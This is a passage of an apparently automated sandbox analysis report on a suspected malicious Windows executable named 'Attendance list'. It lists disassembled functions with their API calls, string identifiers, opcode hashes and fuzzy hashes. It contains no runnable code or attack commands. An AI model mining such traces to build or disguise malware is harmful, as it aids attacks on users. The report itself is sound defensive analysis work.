                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: fd845949973c5d965046a50e2c165546630777599970f287b0700e69e1a8162e
                        • Instruction ID: b286e332bb32bc4ca33844f25709814d04ebc7d466baa1eb6510b9ee39c57bcd
                        • Opcode Fuzzy Hash: fd845949973c5d965046a50e2c165546630777599970f287b0700e69e1a8162e
                        • Instruction Fuzzy Hash: D6518C356087019FDB109F24CC49F2ABBF8EF49710F058969F99ADB2A1DB74E8409F42
                        Function 0092B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092B73B
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0092B7B1
                        • GetLastError.KERNEL32 ref: 0092B7BB
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0092B828
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: d0e5c360f8b5402e115384c4700e806a980827000ebb712b6601c8822d9c38d4
                        • Instruction ID: b7f16a24536b5cddb5de208ce79a6308647e6205fe6b7e207b99fc6230fd7907
                        • Opcode Fuzzy Hash: d0e5c360f8b5402e115384c4700e806a980827000ebb712b6601c8822d9c38d4
                        • Instruction Fuzzy Hash: EE31AF35A00219AFCB00EF68E885EAE7BFCFF84710F148069E506D7296DB719942CB52
                        Function 00919471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009194F6
                        • GetDlgCtrlID.USER32 ref: 00919501
                        • GetParent.USER32 ref: 0091951D
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00919520
                        • GetDlgCtrlID.USER32(?), ref: 00919529
                        • GetParent.USER32(?), ref: 00919545
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00919548
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        • Opcode ID: de3b931edcfb80d1f0a32e3373d0a53e652b5921328282baf3cc9697859e1991
                        • Instruction ID: 830887bf84ac2fb2810bca0bfbf2d6fa3ce7b1c2e878013279c9d4cdef5fd43e
                        • Opcode Fuzzy Hash: de3b931edcfb80d1f0a32e3373d0a53e652b5921328282baf3cc9697859e1991
                        • Instruction Fuzzy Hash: C621F474A00108BBDF00AB64CC95EFEBB79FF89300F104159B922972E1DB759959DB20
                        Function 0091955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009195DF
                        • GetDlgCtrlID.USER32 ref: 009195EA
                        • GetParent.USER32 ref: 00919606
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00919609
                        • GetDlgCtrlID.USER32(?), ref: 00919612
                        • GetParent.USER32(?), ref: 0091962E
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00919631
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        • Opcode ID: 4fab382703d665b68b4f19cf0b993d766f822299e607e91eda06bc7520c4a1e7
                        • Instruction ID: 3c4728f32b62d29a6b336825227bac29c8b665917e9b1453fb5d0fdbf857d286
                        • Opcode Fuzzy Hash: 4fab382703d665b68b4f19cf0b993d766f822299e607e91eda06bc7520c4a1e7
                        • Instruction Fuzzy Hash: 5121B075A0020CBBDF01AB64CCD5EFEBBB9EF49300F114059B921A72A1DB759959AA20
                        Function 00919645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32 ref: 00919651
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00919666
                        • _wcscmp.LIBCMT ref: 00919678
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009196F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend_wcscmp
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1704125052-3381328864
                        • Opcode ID: e1f856937ac85b734166275adb523127a524e15ed0bf5cf1b46757818ffb0a59
                        • Instruction ID: 7ba2afbb4153f3f1d8b7069c9731abc7a35dd315d62dd128e04c38460b629542
                        • Opcode Fuzzy Hash: e1f856937ac85b734166275adb523127a524e15ed0bf5cf1b46757818ffb0a59
                        • Instruction Fuzzy Hash: E0115C3734831BBAFA012625DC2BDE677DCEB023A4F200026FD04E10D1FE51AD805668
                        Function 00938BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00938BEC
                        • CoInitialize.OLE32(00000000), ref: 00938C19
                        • CoUninitialize.OLE32 ref: 00938C23
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00938D23
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00938E50
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00952C0C), ref: 00938E84
                        • CoGetObject.OLE32(?,00000000,00952C0C,?), ref: 00938EA7
                        • SetErrorMode.KERNEL32(00000000), ref: 00938EBA
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00938F3A
                        • VariantClear.OLEAUT32(?), ref: 00938F4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                        • String ID:
                        • API String ID: 2395222682-0
                        • Opcode ID: e566edeb21da0a667d71a9d8c1a9aabcc9e843cd7423fcd6220a1b2f5455dbfb
                        • Instruction ID: 3d6af71ae2261f18c5cf818f737937bd8a1ca559ef7713885b782bafc501b7ac
                        • Opcode Fuzzy Hash: e566edeb21da0a667d71a9d8c1a9aabcc9e843cd7423fcd6220a1b2f5455dbfb
                        • Instruction Fuzzy Hash: 13C102B1208305AFD700EF68C884A2BB7E9FF89748F10496DF58A9B251DB71ED05CB52
                        Function 00924189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                        Download Yara Rule
                        APIs
                        • __swprintf.LIBCMT ref: 0092419D
                        • __swprintf.LIBCMT ref: 009241AA
                          • Part of subcall function 008E38D8: __woutput_l.LIBCMT ref: 008E3931
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 009241D4
                        • LoadResource.KERNEL32(?,00000000), ref: 009241E0
                        • LockResource.KERNEL32(00000000), ref: 009241ED
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 0092420D
                        • LoadResource.KERNEL32(?,00000000), ref: 0092421F
                        • SizeofResource.KERNEL32(?,00000000), ref: 0092422E
                        • LockResource.KERNEL32(?), ref: 0092423A
                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0092429B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                        • String ID:
                        • API String ID: 1433390588-0
                        • Opcode ID: 1736aadf0c020a662ad2e267870587a96d25c1c41b0564df5c22eefc06062ce9
                        • Instruction ID: 54893b93a14564ba1e44cf6385f559cb27bdf1b546e119b8ecd078a22d45cf41
                        • Opcode Fuzzy Hash: 1736aadf0c020a662ad2e267870587a96d25c1c41b0564df5c22eefc06062ce9
                        • Instruction Fuzzy Hash: 7631DE7560922AABCB119FA1EC98EBF7BACFF09301F004425F821D2150E770DA61DBB1
                        Function 009216DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00921700
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00920778,?,00000001), ref: 00921714
                        • GetWindowThreadProcessId.USER32(00000000), ref: 0092171B
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00920778,?,00000001), ref: 0092172A
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092173C
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00920778,?,00000001), ref: 00921755
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00920778,?,00000001), ref: 00921767
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00920778,?,00000001), ref: 009217AC
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00920778,?,00000001), ref: 009217C1
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00920778,?,00000001), ref: 009217CC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: be0f6c75fd327654a53e187cfd14652a8fea7bd8766f3c9f3cf49b9f03f7cb01
                        • Instruction ID: 372d1d76ba34acb11bd8589b785eba991db59b66b40288b01da3d84c6681b673
                        • Opcode Fuzzy Hash: be0f6c75fd327654a53e187cfd14652a8fea7bd8766f3c9f3cf49b9f03f7cb01
                        • Instruction Fuzzy Hash: 6631C175618218BBEB119F55EC84F7ABBEDEBA6711F214024F904C63A0D774DD40DB60
                        Function 008CFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008CFC06
                        • OleUninitialize.OLE32(?,00000000), ref: 008CFCA5
                        • UnregisterHotKey.USER32(?), ref: 008CFDFC
                        • DestroyWindow.USER32(?), ref: 00904A00
                        • FreeLibrary.KERNEL32(?), ref: 00904A65
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00904A92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 7cc2525c7b66d744553ca5bc84145641c185959e28e31470de9875951405441f
                        • Instruction ID: af799ccd6cdc4eab69bf02fe39bb61509d41806313c93d0a48d49e5ad2e3bace
                        • Opcode Fuzzy Hash: 7cc2525c7b66d744553ca5bc84145641c185959e28e31470de9875951405441f
                        • Instruction Fuzzy Hash: 5FA147707012228FDB28EB15C494F69B779FF05700F1442ADEA0AAB2A2DB30ED56CF55
                        Function 0091A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                        Download Yara Rule
                        APIs
                        • EnumChildWindows.USER32(?,0091AA64), ref: 0091A9A2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ChildEnumWindows
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 3555792229-1603158881
                        • Opcode ID: ad3e24ec85a392670f9558bdc24d08798ab2f02b5f775c424a58e366e1b3b69b
                        • Instruction ID: d601c6173d886d1862043efbf9cfd3f11e238ceb2bb7854d16e7003d062feb44
                        • Opcode Fuzzy Hash: ad3e24ec85a392670f9558bdc24d08798ab2f02b5f775c424a58e366e1b3b69b
                        • Instruction Fuzzy Hash: DC91B330B0164AAADB18DF64C881BE9FBB8FF04314F508519D89AA7151DF306ED9CB92
                        Function 008C2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 008C2EAE
                          • Part of subcall function 008C1DB3: GetClientRect.USER32(?,?), ref: 008C1DDC
                          • Part of subcall function 008C1DB3: GetWindowRect.USER32(?,?), ref: 008C1E1D
                          • Part of subcall function 008C1DB3: ScreenToClient.USER32(?,?), ref: 008C1E45
                        • GetDC.USER32 ref: 008FCF82
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008FCF95
                        • SelectObject.GDI32(00000000,00000000), ref: 008FCFA3
                        • SelectObject.GDI32(00000000,00000000), ref: 008FCFB8
                        • ReleaseDC.USER32(?,00000000), ref: 008FCFC0
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008FD04B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 6676aa9e2c23e30668bfb1e28a7ede76483bb08a8a0e5d2f9338e7e690363861
                        • Instruction ID: 63697a8df4bea55da6324541a3c92e8919bae48f36095adb7f4c195bf96e9061
                        • Opcode Fuzzy Hash: 6676aa9e2c23e30668bfb1e28a7ede76483bb08a8a0e5d2f9338e7e690363861
                        • Instruction Fuzzy Hash: D371B03150020DDFCF219F74C984EBA7BB6FF89354F14426AEE55EA2A6CB318841DB60
                        Function 0094C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                          • Part of subcall function 008C2344: GetCursorPos.USER32(?), ref: 008C2357
                          • Part of subcall function 008C2344: ScreenToClient.USER32(009867B0,?), ref: 008C2374
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000001), ref: 008C2399
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000002), ref: 008C23A7
                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0094C2E4
                        • ImageList_EndDrag.COMCTL32 ref: 0094C2EA
                        • ReleaseCapture.USER32 ref: 0094C2F0
                        • SetWindowTextW.USER32(?,00000000), ref: 0094C39A
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0094C3AD
                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0094C48F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                        • API String ID: 1924731296-2107944366
                        • Opcode ID: 0bac18fe9448b1ed769d19d7899b1ad3632d9ab88701fb3097a6e126a2b70e60
                        • Instruction ID: 5982f29ab5a361f0d5d1513aaa6b6341cf9eb2c83d6064bd1b405dc759d5e247
                        • Opcode Fuzzy Hash: 0bac18fe9448b1ed769d19d7899b1ad3632d9ab88701fb3097a6e126a2b70e60
                        • Instruction Fuzzy Hash: A6517974218305AFDB10EF24C899FAA7BF5FB88314F00852DF5959B2A1DB70E948DB52
                        Function 00938F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0094F910), ref: 0093903D
                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0094F910), ref: 00939071
                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009391EB
                        • SysFreeString.OLEAUT32(?), ref: 00939215
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                        • String ID:
                        • API String ID: 560350794-0
                        • Opcode ID: 88c492ceba56d1e5d9f877749b1436a1bb647b5847a9e78dcfbed69957466aa1
                        • Instruction ID: 4d86a1b400e94223d4318f0d9f814204489a5096733f1123754ddbcde2b049ee
                        • Opcode Fuzzy Hash: 88c492ceba56d1e5d9f877749b1436a1bb647b5847a9e78dcfbed69957466aa1
                        • Instruction Fuzzy Hash: 95F11875A00209EFDB04DF94C888EAEB7B9FF89314F108499F916AB251DB71AE45CF50
                        Function 0093F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0093F9C9
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0093FB5C
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0093FB80
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0093FBC0
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0093FBE2
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0093FD5E
                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0093FD90
                        • CloseHandle.KERNEL32(?), ref: 0093FDBF
                        • CloseHandle.KERNEL32(?), ref: 0093FE36
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                        • String ID:
                        • API String ID: 4090791747-0
                        • Opcode ID: ad509a52a85b4da0038d8cbd56160365a6db63c8f2afeac73004b59fe3756866
                        • Instruction ID: e3461805e21eca2162044d01862cae31bef8f19cdcb8d3f0ac8c9d4c25ce5bb6
                        • Opcode Fuzzy Hash: ad509a52a85b4da0038d8cbd56160365a6db63c8f2afeac73004b59fe3756866
                        • Instruction Fuzzy Hash: 7BE19D316042419FCB14EF28C4A5B6ABBE4FF85354F14896DF89A9B2A2DB30DC44CF52
                        Function 00924F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009238D3,?), ref: 009248C7
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009238D3,?), ref: 009248E0
                          • Part of subcall function 00924CD3: GetFileAttributesW.KERNEL32(?,00923947), ref: 00924CD4
                        • lstrcmpiW.KERNEL32(?,?), ref: 00924FE2
                        • _wcscmp.LIBCMT ref: 00924FFC
                        • MoveFileW.KERNEL32(?,?), ref: 00925017
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
